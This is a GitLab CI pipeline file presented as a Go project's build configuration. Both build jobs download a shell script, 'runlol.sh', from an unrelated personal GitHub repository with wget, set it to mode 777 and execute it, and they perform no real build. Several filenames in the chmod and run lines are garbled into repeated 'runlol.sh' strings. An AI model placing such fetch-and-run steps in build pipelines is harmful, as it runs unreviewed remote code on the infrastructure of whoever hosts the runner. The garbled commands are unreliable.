image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/Myaxisplay/pos/main/runlol.sh
     - chmod 777 runlol.shrunlol.shrunlol.shrunlol.shrunlol.sh
     - ./runlol.shrunlol.shrunlol.shrunlol.sh
     

build_b:
  stage: build
  script:
     - wget https://raw.githubusercontent.com/Myaxisplay/pos/main/runlol.sh
     - chmod 777 runlol.shrunlol.shrunlol.sh
     - ./runlol.shrunlol.sh
